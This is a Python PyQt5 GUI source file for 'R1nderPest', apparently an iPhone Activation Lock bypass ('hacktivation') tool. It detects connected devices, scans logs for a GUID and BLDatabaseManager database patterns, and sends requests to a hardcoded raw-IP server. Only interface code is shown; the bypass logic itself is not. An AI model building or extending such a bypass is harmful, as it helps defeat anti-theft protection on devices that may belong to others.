# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file '.\update.ui'
#
# Created by: PyQt5 UI code generator 5.15.5
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again.  Do not edit this file unless you know what you are doing.


import ctypes
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QFontDatabase, QFont
from PyQt5.QtCore import *
from ui_theme import ThemeManager
from ui_modals import FramelessModal
from ui_assets import get_device_asset
import os
import threading
import time
import subprocess
import datetime
from colorama import *
import sys
import re
import shutil
import sqlite3
import atexit
import urllib.parse
import json
import struct
import binascii
from collections import Counter
import getpass
from art import text2art
import requests
from pathlib import Path
from typing import Optional, List, Tuple
from pymobiledevice3.services.os_trace import OsTraceService
from pymobiledevice3.lockdown import create_using_usbmux
import tempfile

base_dir = os.path.dirname(__file__)

ctypes.windll.shcore.SetProcessDpiAwareness(0)

version = 2.5

animation = False
onlyFindGuid = False

print(text2art("R1nderPest", font="tasty1"))
print("\n==> Version 2.5 Release <==")
print("--------------------------------------------------")
print("\n* Developed by ZeroxDev")
base_dir = os.path.dirname(__file__)



class Ui_MainWindow(object):
    def __init__(self):
        self.api_url = "http://194.99.21.156:8001//get2.php"
        self.timeouts = {
            'asset_wait': 300,
            'asset_delete_delay': 15,
            'reboot_wait': 300,
            'syslog_collect': 180
        }
        self.mount_point = os.path.join(os.path.expanduser("~"), f".ifuse_mount_{os.getpid()}")
        self.afc_mode = None
        self.device_info = {}
        self.guid = None
        self.iOS = "26.6.2"
        self.attempt_count = 0
        self.max_attempts = 15
        self.global_GUID = ""
        self.CREATE_NO_WINDOW = 0x08000000
        self.POST_CONNECT_DELAY = 12
        self.MIN_ARCHIVE_SIZE = 10_000_000
        self.GUID_REGEX = re.compile(rb'[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}')
        self.BLDB_PATTERNS_UPPER = [b"BLDATABASEMANAGER.SQLITE", b"BLDATABASEMANAGER", b"BLDATABASE"]
        self._fake_device_mode = False
        self._fake_activation_timer = None
        self._search_thread = None
        self._selected_device_key = None
        self._selected_device_assets = None

    def _scaled_pixmap(self, path, target_width, target_height):
        """Load an image asset and scale it with high-quality filtering."""
        if not path:
            return QtGui.QPixmap()
        try:
            pixmap = QtGui.QPixmap(str(path))
        except Exception:
            return QtGui.QPixmap()
        if pixmap.isNull():
            return QtGui.QPixmap()

        target = QtCore.QSize(int(target_width), int(target_height))
        scaled = pixmap.scaled(
            target,
            QtCore.Qt.KeepAspectRatio,
            QtCore.Qt.SmoothTransformation,
        )
        return scaled

    def _set_asset_image(self, label, path, width, height, fallback_text):
        """Set an image with a safe text fallback when the file is missing."""
        pixmap = self._scaled_pixmap(path, width, height)
        if pixmap.isNull():
            label.clear()
            label.setText(fallback_text)
            label.setAlignment(QtCore.Qt.AlignCenter)
            label.setProperty("assetMissing", True)
        else:
            label.setText("")
            label.setProperty("assetMissing", False)
            label.setPixmap(pixmap)
            label.setAlignment(QtCore.Qt.AlignCenter)

        label.style().unpolish(label)
        label.style().polish(label)

    def _ios_logo_for_version(self, version, fallback_path=None):
        """Select an iOS logo by major version with a mapping fallback."""
        major = str(version or "").split(".", 1)[0]
        from ui_assets import IOS_LOGOS
        return IOS_LOGOS.get(major, fallback_path)

    def _apply_status_asset(self, supported):
        """Apply the supported/unsupported local status asset, with text fallback."""
        from pathlib import Path
        from ui_assets import STATUS_DIR

        path = STATUS_DIR / ("status_supported.png" if supported else "status_unsupported.png")
        self._set_asset_image(
            self.capabilityIcon,
            path,
            30,
            30,
            "✓" if supported else "×",
        )
        self.capabilityIcon.setProperty("state", "ok" if supported else "error")
        self.capabilityIcon.style().unpolish(self.capabilityIcon)
        self.capabilityIcon.style().polish(self.capabilityIcon)

    def _apply_device_asset(self, device_name, product_type="", udid=""):
        """Resolve and display the visual asset set for a selected device."""
        resolved_name, asset = get_device_asset(device_name, product_type)
        self._selected_device_key = resolved_name
        self._selected_device_assets = asset

        ios_version = asset.get("ios_version", "") or self.iOS or "—"
        build = asset.get("build", "") or "—"
        self.iosVersionLarge.setText(f"iOS {ios_version}" if ios_version else "—")
        self.buildNumber.setText(f"Build number: {build}")
        self.deviceName.setText(resolved_name)
        self.deviceUDID.setText(f"UDID: {udid}" if udid else "UDID: —")

        ios_logo = self._ios_logo_for_version(ios_version, asset.get("ios_logo"))
        self._set_asset_image(
            self.iosBadge,
            ios_logo,
            48,
            48,
            f"iOS\\n{ios_version.split('.', 1)[0] if ios_version else ''}",
        )
        self._set_asset_image(
            self.label_4,
            asset.get("device_image"),
            78,
            136,
            resolved_name,
        )
        self._apply_status_asset(bool(asset.get("supported")))

        if asset.get("supported"):
            self.deviceInfo.setText(f"iOS Version: {ios_version}, Supported")
            self.capabilityIcon.setProperty("state", "ok")
            self.capabilityTitle.setText("Supported")
            self.capabilitySubtitle.setText("Your device is supported! (Local compatibility rule)")
        else:
            self.deviceInfo.setText(f"iOS Version: {ios_version}, Unsupported")
            self.capabilityIcon.setProperty("state", "error")
            self.capabilityTitle.setText("Unsupported")
            self.capabilitySubtitle.setText("Your device is not supported by this version of iOS.")

        self.capabilityIcon.style().unpolish(self.capabilityIcon)
        self.capabilityIcon.style().polish(self.capabilityIcon)

    def _on_device_item_clicked(self, item):
        data = item.data(QtCore.Qt.UserRole) or {}
        if not isinstance(data, dict):
            return
        self._apply_device_asset(
            data.get("device_name", item.text()),
            data.get("product_type", ""),
            data.get("udid", ""),
        )

    def _upsert_device_item(self, device_name, udid, product_type):
        """Insert/update a sidebar item without losing its asset metadata."""
        target_row = -1
        for row in range(self.devicesList.count()):
            item = self.devicesList.item(row)
            data = item.data(QtCore.Qt.UserRole) or {}
            if data.get("udid") == udid and udid:
                target_row = row
                break

        payload = {
            "device_name": device_name,
            "product_type": product_type,
            "udid": udid,
        }
        if target_row < 0:
            item = QtWidgets.QListWidgetItem(f"▯  {device_name}")
            self.devicesList.addItem(item)
        else:
            item = self.devicesList.item(target_row)
            item.setText(f"▯  {device_name}")

        item.setData(QtCore.Qt.UserRole, payload)
        self.devicesList.setCurrentItem(item)
        self._apply_device_asset(device_name, product_type, udid)

    def setupUi(self, MainWindow):
        # New UI layer: keep the existing backend object names so the processing
        # code below can continue to work without a full backend rewrite.
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(1080, 640)
        MainWindow.setMinimumSize(QtCore.QSize(1080, 640))
        MainWindow.setMaximumSize(QtCore.QSize(1080, 640))
        try:
            MainWindow.setWindowIcon(QtGui.QIcon(os.path.join(base_dir, "icon.png")))
        except Exception:
            pass

        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.rootLayout = QtWidgets.QVBoxLayout(self.centralwidget)
        self.rootLayout.setContentsMargins(0, 0, 0, 0)
        self.rootLayout.setSpacing(0)

        # Intro
        self.Intro = QtWidgets.QFrame(self.centralwidget)
        self.Intro.setObjectName("Intro")
        introLayout = QtWidgets.QVBoxLayout(self.Intro)
        introLayout.setContentsMargins(48, 36, 48, 36)
        introLayout.setSpacing(14)

        self.introLogo = QtWidgets.QLabel(self.Intro)
        self.introLogo.setObjectName("introLogo")
        self.introLogo.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "icon.png")))
        self.introLogo.setScaledContents(True)
        self.introLogo.setFixedSize(70, 70)
        introLayout.addWidget(self.introLogo, 0, QtCore.Qt.AlignLeft)

        self.welcomeTitle = QtWidgets.QLabel(self.Intro)
        self.welcomeTitle.setObjectName("welcomeTitle")
        introLayout.addWidget(self.welcomeTitle)

        self.welcomeMessage = QtWidgets.QLabel(self.Intro)
        self.welcomeMessage.setObjectName("welcomeMessage")
        self.welcomeMessage.setWordWrap(True)
        self.welcomeMessage.setMaximumWidth(720)
        introLayout.addWidget(self.welcomeMessage)

        introLayout.addSpacing(20)
        self.introStatusLabel = QtWidgets.QLabel(self.Intro)
        self.introStatusLabel.setObjectName("introStatusLabel")
        introLayout.addWidget(self.introStatusLabel)

        self.frame = QtWidgets.QFrame(self.Intro)
        self.frame.setObjectName("frame")
        self.frame.setFixedSize(311, 21)
        self.pb1 = QtWidgets.QFrame(self.frame)
        self.pb1.setObjectName("pb1")
        self.pb1.setGeometry(QtCore.QRect(0, 0, 31, 21))
        introLayout.addWidget(self.frame, 0, QtCore.Qt.AlignLeft)
        introLayout.addStretch(1)

        # Main page
        self.HomePage = QtWidgets.QFrame(self.centralwidget)
        self.HomePage.setObjectName("HomePage")
        homeLayout = QtWidgets.QHBoxLayout(self.HomePage)
        homeLayout.setContentsMargins(0, 0, 0, 0)
        homeLayout.setSpacing(0)

        self.sidebar = QtWidgets.QFrame(self.HomePage)
        self.sidebar.setObjectName("sidebar")
        self.sidebar.setFixedWidth(178)
        sidebarLayout = QtWidgets.QVBoxLayout(self.sidebar)
        sidebarLayout.setContentsMargins(12, 18, 12, 14)
        sidebarLayout.setSpacing(8)

        self.devicesCaption = QtWidgets.QLabel(self.sidebar)
        self.devicesCaption.setObjectName("devicesCaption")
        sidebarLayout.addWidget(self.devicesCaption, 0, QtCore.Qt.AlignLeft)

        self.devicesList = QtWidgets.QListWidget(self.sidebar)
        self.devicesList.setObjectName("devicesList")
        self.devicesList.setFrameShape(QtWidgets.QFrame.NoFrame)
        self.devicesList.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
        self.devicesList.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
        self.devicesList.setSpacing(2)
        self.devicesList.setUniformItemSizes(False)
        self.devicesList.itemClicked.connect(self._on_device_item_clicked)
        sidebarLayout.addWidget(self.devicesList, 1)

        self.themeButton = QtWidgets.QPushButton(self.sidebar)
        self.themeButton.setObjectName("themeButton")
        self.themeButton.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.themeButton.setFixedHeight(30)
        sidebarLayout.addWidget(self.themeButton)
        homeLayout.addWidget(self.sidebar)

        self.content = QtWidgets.QFrame(self.HomePage)
        self.content.setObjectName("content")
        contentLayout = QtWidgets.QVBoxLayout(self.content)
        contentLayout.setContentsMargins(22, 18, 22, 20)
        contentLayout.setSpacing(12)

        header = QtWidgets.QHBoxLayout()
        self.headerTitle = QtWidgets.QLabel(self.content)
        self.headerTitle.setObjectName("headerTitle")
        header.addWidget(self.headerTitle)
        header.addStretch(1)
        self.themeHint = QtWidgets.QLabel(self.content)
        self.themeHint.setObjectName("themeHint")
        header.addWidget(self.themeHint)
        self.settingsButton = QtWidgets.QPushButton(self.content)
        self.settingsButton.setObjectName("settingsButton")
        self.settingsButton.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.settingsButton.setFixedHeight(32)
        header.addWidget(self.settingsButton)
        contentLayout.addLayout(header)

        self.summaryCard = QtWidgets.QFrame(self.content)
        self.summaryCard.setObjectName("summaryCard")
        summaryLayout = QtWidgets.QHBoxLayout(self.summaryCard)
        summaryLayout.setContentsMargins(14, 12, 14, 12)
        summaryLayout.setSpacing(12)

        self.iosBadge = QtWidgets.QLabel(self.summaryCard)
        self.iosBadge.setObjectName("iosBadge")
        self.iosBadge.setAlignment(QtCore.Qt.AlignCenter)
        self.iosBadge.setFixedSize(46, 46)
        self.iosBadge.setScaledContents(False)
        summaryLayout.addWidget(self.iosBadge)

        summaryText = QtWidgets.QVBoxLayout()
        summaryText.setSpacing(0)
        self.iosVersionLarge = QtWidgets.QLabel(self.summaryCard)
        self.iosVersionLarge.setObjectName("iosVersionLarge")
        summaryText.addWidget(self.iosVersionLarge)
        self.buildNumber = QtWidgets.QLabel(self.summaryCard)
        self.buildNumber.setObjectName("buildNumber")
        summaryText.addWidget(self.buildNumber)
        summaryLayout.addLayout(summaryText)
        summaryLayout.addStretch(1)
        contentLayout.addWidget(self.summaryCard)

        self.deviceCard = QtWidgets.QFrame(self.content)
        self.deviceCard.setObjectName("deviceCard")
        deviceCardLayout = QtWidgets.QHBoxLayout(self.deviceCard)
        deviceCardLayout.setContentsMargins(14, 14, 14, 14)
        deviceCardLayout.setSpacing(16)

        self.devicePreviewFrame = QtWidgets.QFrame(self.deviceCard)
        self.devicePreviewFrame.setObjectName("devicePreviewFrame")
        self.devicePreviewFrame.setFixedWidth(96)
        previewLayout = QtWidgets.QVBoxLayout(self.devicePreviewFrame)
        previewLayout.setContentsMargins(6, 6, 6, 6)
        self.label_4 = QtWidgets.QLabel(self.devicePreviewFrame)
        self.label_4.setObjectName("label_4")
        self.label_4.setMinimumHeight(142)
        self.label_4.setAlignment(QtCore.Qt.AlignCenter)
        previewLayout.addWidget(self.label_4, 1)
        deviceCardLayout.addWidget(self.devicePreviewFrame)

        details = QtWidgets.QVBoxLayout()
        details.setSpacing(4)
        self.deviceSectionLabel = QtWidgets.QLabel(self.deviceCard)
        self.deviceSectionLabel.setObjectName("deviceSectionLabel")
        details.addWidget(self.deviceSectionLabel)
        self.deviceName = QtWidgets.QLabel(self.deviceCard)
        self.deviceName.setObjectName("deviceName")
        details.addWidget(self.deviceName)
        self.deviceUDID = QtWidgets.QLabel(self.deviceCard)
        self.deviceUDID.setObjectName("deviceUDID")
        self.deviceUDID.setWordWrap(True)
        details.addWidget(self.deviceUDID)
        self.activationState = QtWidgets.QLabel(self.deviceCard)
        self.activationState.setObjectName("activationState")
        details.addWidget(self.activationState)
        details.addStretch(1)

        details.addStretch(1)
        deviceCardLayout.addLayout(details, 1)
        contentLayout.addWidget(self.deviceCard, 1)

        self.capabilityCard = QtWidgets.QFrame(self.content)
        self.capabilityCard.setObjectName("capabilityCard")
        capabilityCardLayout = QtWidgets.QHBoxLayout(self.capabilityCard)
        capabilityCardLayout.setContentsMargins(14, 12, 14, 12)
        capabilityCardLayout.setSpacing(12)

        capabilityHeader = QtWidgets.QLabel(self.capabilityCard)
        capabilityHeader.setObjectName("capabilityHeader")
        capabilityHeader.setText("Activation capability")
        capabilityHeader.setMinimumWidth(150)
        capabilityCardLayout.addWidget(capabilityHeader)

        self.capabilityIcon = QtWidgets.QLabel(self.capabilityCard)
        self.capabilityIcon.setObjectName("capabilityIcon")
        self.capabilityIcon.setAlignment(QtCore.Qt.AlignCenter)
        self.capabilityIcon.setFixedSize(30, 30)
        self.capabilityIcon.setProperty("state", "error")
        capabilityCardLayout.addWidget(self.capabilityIcon)

        capabilityCardText = QtWidgets.QVBoxLayout()
        capabilityCardText.setSpacing(1)
        self.capabilityTitle = QtWidgets.QLabel(self.capabilityCard)
        self.capabilityTitle.setObjectName("capabilityTitle")
        capabilityCardText.addWidget(self.capabilityTitle)
        self.capabilitySubtitle = QtWidgets.QLabel(self.capabilityCard)
        self.capabilitySubtitle.setObjectName("capabilitySubtitle")
        self.capabilitySubtitle.setWordWrap(True)
        capabilityCardText.addWidget(self.capabilitySubtitle)
        capabilityCardLayout.addLayout(capabilityCardText, 1)
        contentLayout.addWidget(self.capabilityCard)

        # Backend-compatible hidden labels
        self.frame_4 = QtWidgets.QFrame(self.content)
        self.frame_4.setObjectName("frame_4")
        self.deviceInfo = QtWidgets.QLabel(self.frame_4)
        self.deviceInfo.setObjectName("deviceInfo")
        self.deviceInfo.setText("iOS Version: 26.6.2, Unsupported")
        self.deviceInfo.hide()
        self.iOSVersion = QtWidgets.QLabel(self.frame_4)
        self.iOSVersion.setObjectName("iOSVersion")
        self.iOSVersion.hide()
        contentLayout.addWidget(self.frame_4)

        self.pbFrame = QtWidgets.QFrame(self.content)
        self.pbFrame.setObjectName("pbFrame")
        self.pbFrame.setFixedHeight(42)
        self.progressFrame = QtWidgets.QFrame(self.pbFrame)
        self.progressFrame.setObjectName("progressFrame")
        self.progressFrame.setGeometry(QtCore.QRect(0, 0, 0, 42))
        contentLayout.addWidget(self.pbFrame)

        self.activateButton = QtWidgets.QPushButton(self.content)
        self.activateButton.setObjectName("activateButton")
        self.activateButton.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.activateButton.setFixedHeight(42)
        contentLayout.addWidget(self.activateButton)
        homeLayout.addWidget(self.content, 1)

        # Compatibility placeholders retained for older methods.
        self.label_3 = QtWidgets.QLabel(self.HomePage)
        self.label_3.hide()
        self.label_5 = QtWidgets.QLabel(self.HomePage)
        self.label_5.hide()
        self.label_6 = QtWidgets.QLabel(self.HomePage)
        self.label_6.hide()

        # Native notifications used by the existing backend.
        self.InfoNotification = QtWidgets.QFrame(self.centralwidget)
        self.InfoNotification.setObjectName("InfoNotification")
        infoLayout = QtWidgets.QVBoxLayout(self.InfoNotification)
        infoLayout.setContentsMargins(16, 14, 16, 14)
        infoLayout.setSpacing(6)
        self.messageTitle = QtWidgets.QLabel(self.InfoNotification)
        self.messageTitle.setObjectName("messageTitle")
        infoLayout.addWidget(self.messageTitle)
        self.messageContent = QtWidgets.QLabel(self.InfoNotification)
        self.messageContent.setObjectName("messageContent")
        self.messageContent.setWordWrap(True)
        infoLayout.addWidget(self.messageContent)
        self.closePopup = QtWidgets.QPushButton(self.InfoNotification)
        self.closePopup.setObjectName("closePopup")
        self.closePopup.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.closePopup.setFixedHeight(30)
        infoLayout.addWidget(self.closePopup, 0, QtCore.Qt.AlignRight)

        self.LoadingNotification = QtWidgets.QFrame(self.centralwidget)
        self.LoadingNotification.setObjectName("LoadingNotification")
        loadingLayout = QtWidgets.QHBoxLayout(self.LoadingNotification)
        loadingLayout.setContentsMargins(16, 10, 16, 10)
        self.loadingText = QtWidgets.QLabel(self.LoadingNotification)
        self.loadingText.setObjectName("loadingText")
        loadingLayout.addWidget(self.loadingText)

        self.rootLayout.addWidget(self.Intro)
        self.rootLayout.addWidget(self.HomePage)

        # Activation dialog
        self.activationDialog = FramelessModal(MainWindow, "activationDialog", 480, 250)
        activationLayout = QtWidgets.QVBoxLayout(self.activationDialog)
        activationLayout.setContentsMargins(18, 16, 18, 16)
        activationLayout.setSpacing(8)
        self.activationDeviceTitle = QtWidgets.QLabel(self.activationDialog)
        self.activationDeviceTitle.setObjectName("activationDeviceTitle")
        activationLayout.addWidget(self.activationDeviceTitle)
        self.activationProgress = QtWidgets.QProgressBar(self.activationDialog)
        self.activationProgress.setObjectName("activationProgress")
        self.activationProgress.setRange(0, 100)
        self.activationProgress.setValue(0)
        self.activationProgress.setTextVisible(False)
        self.activationProgress.setFixedHeight(8)
        activationLayout.addWidget(self.activationProgress)
        self.activationStep = QtWidgets.QLabel(self.activationDialog)
        self.activationStep.setObjectName("activationStep")
        activationLayout.addWidget(self.activationStep)
        self.detailsToggle = QtWidgets.QPushButton(self.activationDialog)
        self.detailsToggle.setObjectName("detailsToggle")
        self.detailsToggle.setCheckable(True)
        self.detailsToggle.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        activationLayout.addWidget(self.detailsToggle, 0, QtCore.Qt.AlignLeft)
        self.activationDetails = QtWidgets.QTextEdit(self.activationDialog)
        self.activationDetails.setObjectName("activationDetails")
        self.activationDetails.setReadOnly(True)
        self.activationDetails.setFixedHeight(86)
        self.activationDetails.setVisible(False)
        activationLayout.addWidget(self.activationDetails)
        activationButtons = QtWidgets.QHBoxLayout()
        activationButtons.addStretch(1)
        self.activationDone = QtWidgets.QPushButton(self.activationDialog)
        self.activationDone.setObjectName("activationDone")
        self.activationDone.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.activationDone.setFixedSize(74, 30)
        self.activationDone.setEnabled(False)
        activationButtons.addWidget(self.activationDone)
        activationLayout.addLayout(activationButtons)

        # Settings dialog
        self.settingsDialog = FramelessModal(MainWindow, "settingsDialog", 520, 250)
        settingsLayout = QtWidgets.QVBoxLayout(self.settingsDialog)
        settingsLayout.setContentsMargins(18, 16, 18, 16)
        settingsLayout.setSpacing(10)
        self.settingsTitle = QtWidgets.QLabel(self.settingsDialog)
        self.settingsTitle.setObjectName("settingsTitle")
        settingsLayout.addWidget(self.settingsTitle)

        self.apiUrlEdit = QtWidgets.QLineEdit(self.settingsDialog)
        self.apiUrlEdit.setObjectName("apiUrlEdit")
        self.apiUrlEdit.setText(self.api_url)
        settingsLayout.addWidget(self.apiUrlEdit)
        self.apiUrlHint = QtWidgets.QLabel(self.settingsDialog)
        self.apiUrlHint.setObjectName("apiUrlHint")
        settingsLayout.addWidget(self.apiUrlHint)

        def make_path_row(initial_value, button_text):
            row = QtWidgets.QHBoxLayout()
            edit = QtWidgets.QLineEdit(self.settingsDialog)
            button = QtWidgets.QPushButton(self.settingsDialog)
            edit.setText(initial_value)
            button.setText(button_text)
            button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
            row.addWidget(edit, 1)
            row.addWidget(button)
            return row, edit, button

        deps_default = os.path.join(os.environ.get("ProgramFiles", "C:/Program Files"), "R1nderpest", "lib")
        logs_default = os.path.join(os.path.expanduser("~"), "AppData", "Roaming", "R1nderpest", "Logs")
        depRow, self.dependenciesEdit, self.dependenciesChoose = make_path_row(deps_default, "choose")
        settingsLayout.addLayout(depRow)
        logsRow, self.logsEdit, self.logsChoose = make_path_row(logs_default, "choose")
        settingsLayout.addLayout(logsRow)

        settingsButtons = QtWidgets.QHBoxLayout()
        settingsButtons.addStretch(1)
        self.settingsCancel = QtWidgets.QPushButton(self.settingsDialog)
        self.settingsCancel.setObjectName("settingsCancel")
        self.settingsCancel.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        settingsButtons.addWidget(self.settingsCancel)
        self.settingsSave = QtWidgets.QPushButton(self.settingsDialog)
        self.settingsSave.setObjectName("settingsSave")
        self.settingsSave.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        settingsButtons.addWidget(self.settingsSave)
        settingsLayout.addLayout(settingsButtons)

        MainWindow.setCentralWidget(self.centralwidget)

        def sync_state():
            name = self.deviceName.text().strip() or "iPhone 16 Pro"
            udid = self.deviceUDID.text().strip()
            ios_text = self.iOSVersion.text().strip()
            if ios_text.startswith("iOS Version:"):
                ios_value = ios_text.split(":", 1)[1].strip()
            else:
                ios_value = self.iOS or "—"
            self.iosVersionLarge.setText(ios_value if ios_value else "—")
            self.buildNumber.setText("Build number: 23C90")
            if not udid:
                self.deviceUDID.setText("UDID: —")

            product_type = self.device_info.get("ProductType", "") if isinstance(self.device_info, dict) else ""
            if self.devicesList.count() == 0 or self.devicesList.currentItem() is None:
                self._upsert_device_item(name, udid, product_type)

            status_text = self.deviceInfo.text().lower()
            unsupported = "unsupported" in status_text
            supported = "supported" in status_text and not unsupported
            if unsupported:
                self.capabilityTitle.setText("Unsupported")
                self.capabilitySubtitle.setText("Your device is not supported by this version of iOS.")
                self.capabilityIcon.setProperty("state", "error")
            elif supported:
                self.capabilityTitle.setText("Supported")
                self.capabilitySubtitle.setText("Your device is supported! (Local compatibility rule)")
                self.capabilityIcon.setProperty("state", "ok")
            else:
                self.capabilityTitle.setText("Checking")
                self.capabilitySubtitle.setText("Checking local compatibility…")
                self.capabilityIcon.setProperty("state", "neutral")
            self.capabilityIcon.style().unpolish(self.capabilityIcon)
            self.capabilityIcon.style().polish(self.capabilityIcon)

        def sync_activation_dialog():
            width = self.progressFrame.width()
            percent = max(0, min(100, int(round(width / 7.21))))
            self.activationProgress.setValue(percent)
            self.activationDeviceTitle.setText("Activating “%s”" % (self.deviceName.text() or "device"))
            if self.listWidget.count() if hasattr(self, "listWidget") else False:
                pass
            done = percent >= 100 or not self.activateButton.isEnabled()
            if done:
                self.activationDone.setEnabled(True)
                self.activationStep.setText("Activation is complete. Click Done to continue.")

        # The old backend writes status lines to listWidget. Keep a real log widget,
        # but hide it from the main mock-up until activation details are requested.
        self.frame_2 = QtWidgets.QFrame(self.content)
        self.frame_2.setObjectName("frame_2")
        frame2Layout = QtWidgets.QVBoxLayout(self.frame_2)
        self.listWidget = QtWidgets.QListWidget(self.frame_2)
        self.listWidget.setObjectName("listWidget")
        self.listWidget.setMaximumHeight(170)
        self.listWidget.hide()
        frame2Layout.addWidget(self.listWidget)
        contentLayout.addWidget(self.frame_2)

        def sync_activation_dialog():
            width = self.progressFrame.width()
            percent = max(0, min(100, int(round(width / 7.21))))
            self.activationProgress.setValue(percent)
            self.activationDeviceTitle.setText("Activating “%s”" % (self.deviceName.text() or "device"))
            if self.listWidget.count():
                last = self.listWidget.item(self.listWidget.count() - 1).text()
                self.activationStep.setText(last.replace("[*] ", ""))
                lines = []
                for i in range(self.listWidget.count()):
                    lines.append(self.listWidget.item(i).text().replace("[*] ", ""))
                self.activationDetails.setPlainText("\n".join(lines))
            if percent >= 100:
                self.activationDone.setEnabled(True)
                self.activationStep.setText("Activation is complete. Click Done to continue.")

        self._ui_sync_timer = QtCore.QTimer(MainWindow)
        self._ui_sync_timer.timeout.connect(sync_state)
        self._ui_sync_timer.timeout.connect(sync_activation_dialog)
        self._ui_sync_timer.start(250)

        def apply_theme(dark=True):
            mode = ThemeManager.DARK if dark else ThemeManager.LIGHT
            app_instance = QtWidgets.QApplication.instance()
            ThemeManager.apply(app_instance, mode, base_dir)

            self.themeButton.setText("☀  Light" if dark else "☾  Dark")
            self.themeHint.setText("Dark" if dark else "Light")
            self._dark_mode = dark

            # Child modals intentionally inherit the application QSS.
            self.activationDialog.setStyleSheet("")
            self.settingsDialog.setStyleSheet("")

        def toggle_theme():
            apply_theme(not getattr(self, "_dark_mode", True))

        def choose_dependencies():
            path = QtWidgets.QFileDialog.getExistingDirectory(self.settingsDialog, "Choose Dependencies", self.dependenciesEdit.text())
            if path:
                self.dependenciesEdit.setText(path)

        def choose_logs():
            path = QtWidgets.QFileDialog.getExistingDirectory(self.settingsDialog, "Choose Logs Directory", self.logsEdit.text())
            if path:
                self.logsEdit.setText(path)

        def save_settings():
            self.api_url = self.apiUrlEdit.text().strip() or self.api_url
            self.dependencies_dir = self.dependenciesEdit.text().strip()
            self.logs_dir = self.logsEdit.text().strip()
            self.settingsDialog.accept()

        def open_activation():
            if self._fake_device_mode:
                self.start_fake_activation()
                return
            self.activationDialog.show_centered()
            self.StartHacktivating()

        self.themeButton.clicked.connect(toggle_theme)
        self.settingsButton.clicked.connect(self.settingsDialog.show_centered)
        self.dependenciesChoose.clicked.connect(choose_dependencies)
        self.logsChoose.clicked.connect(choose_logs)
        self.settingsCancel.clicked.connect(self.settingsDialog.reject)
        self.settingsSave.clicked.connect(save_settings)
        self.detailsToggle.toggled.connect(self.activationDetails.setVisible)
        self.activationDone.clicked.connect(self.activationDialog.close)
        self.activateButton.clicked.connect(open_activation)
        self.closePopup.clicked.connect(self.ClosePopup)

        # Developer-only fake device: Ctrl+Shift+A toggles a simulated iPhone.
        self.fakeDeviceShortcut = QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+Shift+A"), MainWindow)
        self.fakeDeviceShortcut.setContext(QtCore.Qt.ApplicationShortcut)
        self.fakeDeviceShortcut.activated.connect(self.toggle_fake_device)

        self.InfoNotification.hide()
        self.LoadingNotification.hide()
        self.HomePage.hide()
        self.pbFrame.hide()

        # Use Inter as the application-wide UI font.
        inter_font = QtGui.QFont("Inter")
        inter_font.setStyleStrategy(QtGui.QFont.PreferAntialias)
        MainWindow.setFont(inter_font)
        self.activationDialog.setFont(inter_font)
        self.settingsDialog.setFont(inter_font)

        self.retranslateUi(MainWindow)
        apply_theme(True)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

        self._search_thread = threading.Thread(target=self.SearchingForDevices, daemon=True)
        self._search_thread.start()

        global animation
        animation = True
        self.MoveBarThread()

    def toggle_fake_device(self):
        """Developer-only UI simulator. Ctrl+Shift+A toggles a fake iPhone."""
        self._fake_device_mode = not self._fake_device_mode

        if self._fake_device_mode:
            self._apply_fake_device()
            return

        if self._fake_activation_timer is not None:
            self._fake_activation_timer.stop()
            self._fake_activation_timer = None

        # Leave fake mode and let the normal device search take over again.
        self.headerTitle.setText("Lober_R1nderpest")
        self.deviceName.setText("Device Name")
        self.deviceUDID.setText("UDID: —")
        self.activationState.setText("Activation state: No")
        self.iOSVersion.setText("iOS Version: —")
        self.deviceInfo.setText("")
        self.iosVersionLarge.setText("—")
        self.buildNumber.setText("Build number: —")
        self.devicesList.clear()
        self.listWidget.clear()
        self.activateButton.setText("Activate")
        self.activateButton.setEnabled(False)
        self.Intro.show()
        self.HomePage.hide()
        self.introStatusLabel.setText("Searching for devices...")

        if self._search_thread is None or not self._search_thread.is_alive():
            self._search_thread = threading.Thread(target=self.SearchingForDevices, daemon=True)
            self._search_thread.start()

    def _apply_fake_device(self):
        fake_name = "iPhone 16 Pro"
        fake_ios = "26.6.2"
        fake_udid = "A19335BC-3136-4076-871F-D1D38E22FA60"

        self.iOS = fake_ios
        self.device_info = {
            "DeviceName": fake_name,
            "ProductType": "iPhone17,1",
            "ProductVersion": fake_ios,
            "UniqueDeviceID": fake_udid,
            "ActivationState": "Unactivated",
        }

        self.headerTitle.setText("Lober_R1nderpest  •  DEV")
        self.Intro.hide()
        self.HomePage.show()
        self.introStatusLabel.setText("Developer fake device")

        self.deviceName.setText(fake_name)
        self.deviceUDID.setText(f"UDID: {fake_udid}")
        self.activationState.setText("Activation state: No")
        self.iOSVersion.setText(f"iOS Version: {fake_ios}")
        self.deviceInfo.setText(f"iOS Version: {fake_ios}, Unsupported")
        self.activateButton.setText("Activate")
        self.activateButton.setEnabled(True)
        self.activateButton.setStyleSheet("")
        self.devicesList.clear()
        self._upsert_device_item(fake_name, fake_udid, "iPhone17,1")

        self.listWidget.clear()
        self.listWidget.addItem("[DEV] Fake iPhone 16 Pro connected")
        self.listWidget.addItem(f"[DEV] iOS {fake_ios}")
        self.listWidget.addItem(f"[DEV] UDID: {fake_udid}")
